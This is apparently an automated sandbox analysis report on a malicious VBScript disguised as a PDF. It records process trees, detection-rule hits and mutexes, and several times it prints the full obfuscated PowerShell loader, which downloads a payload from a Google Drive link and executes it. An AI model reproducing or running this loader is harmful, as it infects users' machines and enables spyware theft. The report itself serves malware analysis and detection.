              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeCode function: 28_2_052A4D0A28_2_052A4D0A
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeCode function: 28_2_052A4D1528_2_052A4D15
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeCode function: 28_2_052A69BC28_2_052A69BC
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeCode function: 28_2_052A69C528_2_052A69C5
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeCode function: 28_2_052AF1D528_2_052AF1D5
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeCode function: 28_2_052C587528_2_052C5875
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeCode function: 28_2_052A6BE528_2_052A6BE5
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeCode function: 28_2_052A4BC528_2_052A4BC5
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeCode function: 28_2_052AD3D028_2_052AD3D0
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeCode function: 28_2_052AD3D528_2_052AD3D5
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0326132D30_2_0326132D
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0319D34C30_2_0319D34C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0326A35230_2_0326A352
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031F739A30_2_031F739A
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_032703E630_2_032703E6
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031BE3F030_2_031BE3F0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0325027430_2_03250274
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031B52A030_2_031B52A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_032512ED30_2_032512ED
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031CB2C030_2_031CB2C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031A010030_2_031A0100
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0324A11830_2_0324A118
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0327B16B30_2_0327B16B
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0319F17230_2_0319F172
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031E516C30_2_031E516C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_032701AA30_2_032701AA
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031BB1B030_2_031BB1B0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_032681CC30_2_032681CC
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0326F0E030_2_0326F0E0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_032670E930_2_032670E9
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031B70C030_2_031B70C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0325F0CC30_2_0325F0CC
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031D475030_2_031D4750
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031B077030_2_031B0770
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0326F7B030_2_0326F7B0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_032616CC30_2_032616CC
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031CC6E030_2_031CC6E0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031B053530_2_031B0535
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0326757130_2_03267571
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0324D5B030_2_0324D5B0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0327059130_2_03270591
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0326F43F30_2_0326F43F
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0326244630_2_03262446
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031A146030_2_031A1460
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0325E4F630_2_0325E4F6
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0326FB7630_2_0326FB76
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0326AB4030_2_0326AB40
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031CFB8030_2_031CFB80
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031EDBF930_2_031EDBF9
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03266BD730_2_03266BD7
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03223A6C30_2_03223A6C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03267A4630_2_03267A46
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0326FA4930_2_0326FA49
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0324DAAC30_2_0324DAAC
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031AEA8030_2_031AEA80
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031F5AA030_2_031F5AA0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0325DAC630_2_0325DAC6
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031B995030_2_031B9950
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031CB95030_2_031CB950
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031C696230_2_031C6962
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0327A9A630_2_0327A9A6
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031B29A030_2_031B29A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031B284030_2_031B2840
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031BA84030_2_031BA840
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031968B830_2_031968B8
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031DE8F030_2_031DE8F0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031B38E030_2_031B38E0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031D0F3030_2_031D0F30
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0326FF0930_2_0326FF09
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031F2F2830_2_031F2F28
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03224F4030_2_03224F40
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031B1F9230_2_031B1F92
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0326FFB130_2_0326FFB1
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031A2FC830_2_031A2FC8
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031BCFE030_2_031BCFE0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0326EE2630_2_0326EE26
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031B0E5930_2_031B0E59
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031C2E9030_2_031C2E90
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031B9EB030_2_031B9EB0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0326CE9330_2_0326CE93
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0326EEDB30_2_0326EEDB
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031BAD0030_2_031BAD00
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03267D7330_2_03267D73
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031B3D4030_2_031B3D40
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03261D5A30_2_03261D5A
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031C8DBF30_2_031C8DBF
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031CFDC030_2_031CFDC0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031AADE030_2_031AADE0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03229C3230_2_03229C32
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031B0C0030_2_031B0C00
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_03250CB530_2_03250CB5
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0326FCF230_2_0326FCF2
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_031A0CF230_2_031A0CF2
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_00861F9030_2_00861F90
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0085B03030_2_0085B030
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0085D05030_2_0085D050
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0085B18030_2_0085B180
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0085B17530_2_0085B175
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0086564030_2_00865640
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0086383B30_2_0086383B
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0086384030_2_00863840
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0087BCE030_2_0087BCE0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0085CE2730_2_0085CE27
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_0085CE3030_2_0085CE30
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_00E854C430_2_00E854C4
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_00E7E49430_2_00E7E494
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_00E7E5B330_2_00E7E5B3
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_00E7E94C30_2_00E7E94C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_00E7DA1830_2_00E7DA18
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 30_2_00E7CCB330_2_00E7CCB3
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: String function: 23AAB970 appears 84 times
              Source: C:\Windows\SysWOW64\findstr.exeCode function: String function: 0321EA12 appears 84 times
              Source: C:\Windows\SysWOW64\findstr.exeCode function: String function: 031F7E54 appears 88 times
              Source: C:\Windows\SysWOW64\findstr.exeCode function: String function: 031E5130 appears 36 times
              Source: C:\Windows\SysWOW64\findstr.exeCode function: String function: 0322F290 appears 105 times
              Source: C:\Windows\SysWOW64\findstr.exeCode function: String function: 0319B970 appears 266 times
              Source: U00b7pdf.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6449
              Source: unknownProcess created: Commandline size = 6449
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6449Jump to behavior
              Source: amsi64_7436.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_4344.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7436, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 4344, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@40/14@6/6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Beflingens.ComJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3904:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7444:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ogdukn3m.5fs.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U00b7pdf.vbs"
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process Where Name = 'explorer.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7436
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4344
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: U00b7pdf.vbsReversingLabs: Detection: 13%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U00b7pdf.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657e
              Source: C:\Windows\System32\PING.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Unutterability;function Bldagtigeres($Gravic){ .($Semidocumentary) ($Gravic)} function Sinterens($Efemerisk){$Jordspekulationens=4;do{$Velhavers+=$Efemerisk[$Jordspekulationens];$Jordspekulationens+=5;$Relatch=Format-List} until(!$Efemerisk[$Jordspekulationens])$Velhavers}$Feltundersgelses=Sinterens 'D fenTvise .hlT V r. Minw';$Feltundersgelses+=Sinterens 'Ca,sEUnpeBKontcIndeL,iquI ProEBibuNEnact';$forlngerledningen=Sinterens 'SproMabeloNicyz MotiVelol DaclClavaKbyt/';$Eelware=Sinterens 'EjedTStoplEtissMes,1a,di2';$Caplock='Unde[ achntilsESpalTTeak.BrinS PomeU skRManuV S miBo lCPr seEda P b iOSu eIPotaNUdsttclosm TabABe aNForfaRe dgXrayEfootRT.ss]Kata: Cac:Ac.psAan E FicCH lpuIngeRMichIPredTDetryGalaPAtler SproFindTLumbOBaancT.neOAfsplPelm= hel$MetaEHonoE O hlExubwSmaaAaffor,fveE';$forlngerledningen+=Sinterens ' ryo5Pyth. gri0 Ban ul(QuinWCosmiRig nR add.denoDaysw .ocsRead PeroNBroaTAm.n Sem1Ande0Stee.Parm0 Ont; orm KrusWF ntib evn ont6Nupp4Harv;Over HealxDumb6Fed 4outs;rein S,perIniqvBeca:Port1Solo3arri4Brak.Unpe0 F r)Unsm SvanG.llieZooicRep ke plo Pl./Secu2Kata0Audi1Bedd0Dend0 aab1Unus0Min.1Over GrilFhu tiUnderUsureoutefViceostadx.etr/Preo1 Bde3Estl4regn.In d0';$Paabegyndelsers=Sinterens 'Ce tUFabuSTeolE ameRSmaa-RetoAcompg DyseGylln ArkT';$Fibromyxosarcoma=Sinterens 'Tuneh Bl,t P ctCincpChansk nt: Bek/Unco/ UnidEmu.r MatiberavDisue ,fk. SucgDislo TogoPalig MaalBr.wejo,d.WroucFrivoUnjemVedt/Bogsu MelcUdmu?UforeSpejx rsep e,eoluger.strt ivs=BenedPar,oChe w NonnGladlM,sioSp oaUniddBorr&H xai ntedUnmi=Tsum1 ps GIr d7 SweZSa.lLNonqO RanAH bk9 UdbQA coZ NeuG F r5F,si-SandnAcrav Gr AAmebw Haltblaa0 dsabS alW eprXFerl8 B,fi IcoeMaalrGipsl,sop9,linM TimRvan,hTamigTantq';$Stenografere=Sinterens 'Gyn >';$Semidocumentary=Sinterens 'SmreI ConEElskX';$Hypermetamorphotic='Drklokke';$dirigentklokkernes='\Beflingens.Com';Bldagtigeres (Sinterens 'Drif$St mGModpLUntho.ismB StoAPjasLSub :Be eASuprf UndKCru rSla f,rmltUnareRockREmne= gte$Te,eeEmptnjuleV Co :Cat a .plp D,rPSa nD IntA rteTRuffAF nn+Hj d$I dfDFreiIT,otRUnsuI MongArvee mpln AretVe sk onLPugiObipekCarbkha,ve redRCalons ntEUdarS');Bldagtigeres (Sinterens ' Ist$r,paGExchlveneOButcbHe tA HysLHamm:VeteuJordDD safInaulsynge ndutKo tnerg.IBlovnEle.GPublEB.kkrStvlNT,ktESto =Big.$BookfRetsiFluoB InsR PleOFeltMforsY N,nx FacO VmsS Erha.ecirCompCFleto RanmMan a fo .Bit,sOverPMicrLCam.IUngdTDat (Non.$Gld SAlabT CumeInteN AftOEmfagDrejrh.emaChirF Gr Et.ttRT.acESy,u)');Bldagtigeres (Sinterens $Caplock);$Fibromyxosarcoma=$Udfletningerne[0];$Kumiss=(Sinterens ' ice$MbleGUdspLO enONon,B BriASerpLp ym: rbeK VagNCol,UB.ceS YelE sidL S rsHabikUnf eAnisn EmidGasdESvrvsBygn= Ba nbdleE S nWChei- B oO MolbN.alJLumbEUnr.CPapdtUmed F stsSpicyE ots,rget Tr EPalem Spl.Bic.$Cen fEnvieGrosl HaltSkudUTracnStegDUtt,eUnalRPseusSubrg TyneNe rl MaaSHalvEGanos');Bldagtigeres ($Kumiss);Bldagtigeres (Sinterens '
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Unutterability;function Bldagtigeres($Gravic){ .($Semidocumentary) ($Gravic)} function Sinterens($Efemerisk){$Jordspekulationens=4;do{$Velhavers+=$Efemerisk[$Jordspekulationens];$Jordspekulationens+=5;$Relatch=Format-List} until(!$Efemerisk[$Jordspekulationens])$Velhavers}$Feltundersgelses=Sinterens 'D fenTvise .hlT V r. Minw';$Feltundersgelses+=Sinterens 'Ca,sEUnpeBKontcIndeL,iquI ProEBibuNEnact';$forlngerledningen=Sinterens 'SproMabeloNicyz MotiVelol DaclClavaKbyt/';$Eelware=Sinterens 'EjedTStoplEtissMes,1a,di2';$Caplock='Unde[ achntilsESpalTTeak.BrinS PomeU skRManuV S miBo lCPr seEda P b iOSu eIPotaNUdsttclosm TabABe aNForfaRe dgXrayEfootRT.ss]Kata: Cac:Ac.psAan E FicCH lpuIngeRMichIPredTDetryGalaPAtler SproFindTLumbOBaancT.neOAfsplPelm= hel$MetaEHonoE O hlExubwSmaaAaffor,fveE';$forlngerledningen+=Sinterens ' ryo5Pyth. gri0 Ban ul(QuinWCosmiRig nR add.denoDaysw .ocsRead PeroNBroaTAm.n Sem1Ande0Stee.Parm0 Ont; orm KrusWF ntib evn ont6Nupp4Harv;Over HealxDumb6Fed 4outs;rein S,perIniqvBeca:Port1Solo3arri4Brak.Unpe0 F r)Unsm SvanG.llieZooicRep ke plo Pl./Secu2Kata0Audi1Bedd0Dend0 aab1Unus0Min.1Over GrilFhu tiUnderUsureoutefViceostadx.etr/Preo1 Bde3Estl4regn.In d0';$Paabegyndelsers=Sinterens 'Ce tUFabuSTeolE ameRSmaa-RetoAcompg DyseGylln ArkT';$Fibromyxosarcoma=Sinterens 'Tuneh Bl,t P ctCincpChansk nt: Bek/Unco/ UnidEmu.r MatiberavDisue ,fk. SucgDislo TogoPalig MaalBr.wejo,d.WroucFrivoUnjemVedt/Bogsu MelcUdmu?UforeSpejx rsep e,eoluger.strt ivs=BenedPar,oChe w NonnGladlM,sioSp oaUniddBorr&H xai ntedUnmi=Tsum1 ps GIr d7 SweZSa.lLNonqO RanAH bk9 UdbQA coZ NeuG F r5F,si-SandnAcrav Gr AAmebw Haltblaa0 dsabS alW eprXFerl8 B,fi IcoeMaalrGipsl,sop9,linM TimRvan,hTamigTantq';$Stenografere=Sinterens 'Gyn >';$Semidocumentary=Sinterens 'SmreI ConEElskX';$Hypermetamorphotic='Drklokke';$dirigentklokkernes='\Beflingens.Com';Bldagtigeres (Sinterens 'Drif$St mGModpLUntho.ismB StoAPjasLSub :Be eASuprf UndKCru rSla f,rmltUnareRockREmne= gte$Te,eeEmptnjuleV Co :Cat a .plp D,rPSa nD IntA rteTRuffAF nn+Hj d$I dfDFreiIT,otRUnsuI MongArvee mpln AretVe sk onLPugiObipekCarbkha,ve redRCalons ntEUdarS');Bldagtigeres (Sinterens ' Ist$r,paGExchlveneOButcbHe tA HysLHamm:VeteuJordDD safInaulsynge ndutKo tnerg.IBlovnEle.GPublEB.kkrStvlNT,ktESto =Big.$BookfRetsiFluoB InsR PleOFeltMforsY N,nx FacO VmsS Erha.ecirCompCFleto RanmMan a fo .Bit,sOverPMicrLCam.IUngdTDat (Non.$Gld SAlabT CumeInteN AftOEmfagDrejrh.emaChirF Gr Et.ttRT.acESy,u)');Bldagtigeres (Sinterens $Caplock);$Fibromyxosarcoma=$Udfletningerne[0];$Kumiss=(Sinterens ' ice$MbleGUdspLO enONon,B BriASerpLp ym: rbeK VagNCol,UB.ceS YelE sidL S rsHabikUnf eAnisn EmidGasdESvrvsBygn= Ba nbdleE S nWChei- B oO MolbN.alJLumbEUnr.CPapdtUmed F stsSpicyE ots,rget Tr EPalem Spl.Bic.$Cen fEnvieGrosl HaltSkudUTracnStegDUtt,eUnalRPseusSubrg TyneNe rl MaaSHalvEGanos');Bldagtigeres ($Kumiss);Bldagtigeres (Sinterens '
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeProcess created: C:\Windows\SysWOW64\poqexec.exe "C:\Windows\SysWOW64\poqexec.exe"
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeProcess created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"
              Source: C:\Windows\SysWOW64\findstr.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Unutterability;function Bldagtigeres($Gravic){ .($Semidocumentary) ($Gravic)} function Sinterens($Efemerisk){$Jordspekulationens=4;do{$Velhavers+=$Efemerisk[$Jordspekulationens];$Jordspekulationens+=5;$Relatch=Format-List} until(!$Efemerisk[$Jordspekulationens])$Velhavers}$Feltundersgelses=Sinterens 'D fenTvise .hlT V r. Minw';$Feltundersgelses+=Sinterens 'Ca,sEUnpeBKontcIndeL,iquI ProEBibuNEnact';$forlngerledningen=Sinterens 'SproMabeloNicyz MotiVelol DaclClavaKbyt/';$Eelware=Sinterens 'EjedTStoplEtissMes,1a,di2';$Caplock='Unde[ achntilsESpalTTeak.BrinS PomeU skRManuV S miBo lCPr seEda P b iOSu eIPotaNUdsttclosm TabABe aNForfaRe dgXrayEfootRT.ss]Kata: Cac:Ac.psAan E FicCH lpuIngeRMichIPredTDetryGalaPAtler SproFindTLumbOBaancT.neOAfsplPelm= hel$MetaEHonoE O hlExubwSmaaAaffor,fveE';$forlngerledningen+=Sinterens ' ryo5Pyth. gri0 Ban ul(QuinWCosmiRig nR add.denoDaysw .ocsRead PeroNBroaTAm.n Sem1Ande0Stee.Parm0 Ont; orm KrusWF ntib evn ont6Nupp4Harv;Over HealxDumb6Fed 4outs;rein S,perIniqvBeca:Port1Solo3arri4Brak.Unpe0 F r)Unsm SvanG.llieZooicRep ke plo Pl./Secu2Kata0Audi1Bedd0Dend0 aab1Unus0Min.1Over GrilFhu tiUnderUsureoutefViceostadx.etr/Preo1 Bde3Estl4regn.In d0';$Paabegyndelsers=Sinterens 'Ce tUFabuSTeolE ameRSmaa-RetoAcompg DyseGylln ArkT';$Fibromyxosarcoma=Sinterens 'Tuneh Bl,t P ctCincpChansk nt: Bek/Unco/ UnidEmu.r MatiberavDisue ,fk. SucgDislo TogoPalig MaalBr.wejo,d.WroucFrivoUnjemVedt/Bogsu MelcUdmu?UforeSpejx rsep e,eoluger.strt ivs=BenedPar,oChe w NonnGladlM,sioSp oaUniddBorr&H xai ntedUnmi=Tsum1 ps 